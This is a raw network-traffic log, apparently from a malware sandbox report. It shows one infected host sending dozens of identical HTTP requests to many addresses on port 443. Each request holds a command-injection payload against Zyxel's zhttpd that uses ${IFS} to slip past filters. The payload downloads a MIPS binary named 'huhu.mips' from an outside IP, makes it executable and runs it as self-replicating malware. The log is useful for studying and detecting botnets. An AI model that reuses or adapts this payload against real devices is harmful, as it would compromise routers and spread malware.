                                            Feb 2, 2024 06:21:17.723139048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5528192.168.2.154950679.43.50.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723172903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5529192.168.2.1547956219.2.220.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723205090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5530192.168.2.1544708223.27.177.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723253012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5531192.168.2.1546356130.10.40.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723284960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5532192.168.2.1560158175.235.143.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723334074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5533192.168.2.1556328116.118.224.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723381996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5534192.168.2.1537606192.109.124.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723413944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5535192.168.2.153884460.154.222.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723455906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5536192.168.2.1547728201.93.114.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723512888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5537192.168.2.1550976169.79.114.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723547935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5538192.168.2.153808876.60.119.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723575115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5539192.168.2.154697048.68.186.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723603964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5540192.168.2.1560578218.10.222.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723642111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5541192.168.2.154378072.71.217.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723689079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5542192.168.2.154472438.236.202.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723717928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5543192.168.2.1539180194.130.5.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723752975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5544192.168.2.1547468151.173.96.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723781109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5545192.168.2.153822860.194.27.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723834038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5546192.168.2.1545906149.253.110.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723853111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5547192.168.2.153822024.220.217.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723890066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5548192.168.2.1557586176.211.171.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723927975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5549192.168.2.1559726180.152.241.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723970890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5550192.168.2.1534430197.165.115.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724020958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5551192.168.2.1539420165.42.241.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724046946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5552192.168.2.1559936144.89.192.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724071980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5553192.168.2.155631277.76.58.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724102020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5554192.168.2.1536726182.2.94.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724142075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5555192.168.2.15450665.36.124.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724194050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5556192.168.2.1554358107.94.243.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724231005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5557192.168.2.1554582168.70.81.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724281073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5558192.168.2.1545764120.3.181.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724308968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5559192.168.2.1534434185.244.60.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724345922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5560192.168.2.1548640185.228.21.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724401951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5561192.168.2.1554084138.229.48.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724431038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5562192.168.2.1546436106.227.186.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724467039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5563192.168.2.1541178139.226.54.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724500895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5564192.168.2.1545842153.70.37.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724529028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5565192.168.2.155207686.244.129.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724570036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5566192.168.2.1534960211.36.87.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724603891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5567192.168.2.1538598210.96.109.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724632978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5568192.168.2.154167484.57.180.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724667072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5569192.168.2.1555104220.80.254.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724685907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5570192.168.2.155991640.124.49.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724701881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5571192.168.2.155913281.202.193.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724767923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5572192.168.2.1560698211.16.203.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724791050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5573192.168.2.154532694.89.50.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724849939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5574192.168.2.1560092223.64.120.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724889040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5575192.168.2.1550942181.24.172.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724925995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5576192.168.2.1546318150.255.215.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724963903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5577192.168.2.1559396191.82.54.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.724996090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5578192.168.2.154699646.116.148.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725044012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5579192.168.2.1536576133.151.45.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725044966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5580192.168.2.1544622175.1.149.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725076914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5581192.168.2.1555044161.100.36.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725141048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5582192.168.2.1555570189.76.111.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725163937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5583192.168.2.155914472.252.193.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725204945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5584192.168.2.153458040.17.61.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725240946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5585192.168.2.156044664.148.129.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725276947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5586192.168.2.153595061.201.105.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725315094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5587192.168.2.155961873.80.67.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725337982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5588192.168.2.15484749.200.243.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725368977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5589192.168.2.1534594139.69.92.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725413084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5590192.168.2.1555512116.82.1.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725457907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5591192.168.2.1555556115.123.216.180443
                                            TimestampBytes transferredDirectionData
